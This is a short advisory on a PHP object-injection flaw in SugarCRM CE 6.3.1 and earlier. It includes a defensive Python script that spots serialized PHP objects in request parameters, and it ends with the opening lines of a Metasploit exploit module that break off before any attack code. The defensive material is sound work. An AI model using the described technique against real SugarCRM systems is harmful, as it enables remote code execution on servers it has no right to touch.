SugarCRM CE <= 6.3.1 contains scripts that call "unserialize()" on user-controlled input, which allows remote malicious users to execute arbitrary PHP code.
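For defenders, this bug class leaves a recognisable trace: a request parameter whose value contains a PHP serialized object. The following detection sketch is an added example, not part of the Metasploit module or of SugarCRM; the parameter names and sample request bodies are constructed, and it checks only the raw value and a single base64 layer.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlencode

# PHP serialize() object markers: O:<len>:"<Class>":<count>:{ and C:<len>:"<Class>":<len>:{
# Anchored to the start of the value or to a preceding ';' / '{' so objects nested
# inside a serialized array are found too. An explicit '+' on the length is tolerated.
PHP_OBJECT = re.compile(r'(?:^|[;{])[OC]:\+?\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')


def _decodings(value):
    """Yield the value as received and, when it is valid base64, decoded once."""
    yield value
    try:
        padded = value + "=" * (-len(value) % 4)
        yield base64.b64decode(padded, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        pass


def find_serialized_objects(body):
    """Return the names of form/query parameters that carry a PHP serialized object."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if any(PHP_OBJECT.search(v) for v in _decodings(value)):
            hits.append(name)
    return hits


# Constructed sample request bodies; the parameter names are hypothetical.
OBJ = 'O:8:"stdClass":1:{s:1:"a";i:1;}'
SAMPLES = {
    "plain form": urlencode({"module": "Contacts", "action": "index"}),
    "scalar array": urlencode({"prefs": 'a:2:{i:0;s:3:"foo";i:1;i:5;}'}),
    "nested object": urlencode({"prefs": 'a:1:{i:0;' + OBJ + '}'}),
    "base64 object": urlencode({"state": base64.b64encode(OBJ.encode()).decode()}),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:14} -> {find_serialized_objects(body) or 'clean'}")
```

A hit is a lead for log review or a WAF rule, not a fix: the durable mitigation is on the PHP side, where request data should not reach unserialize() at all.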
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit ...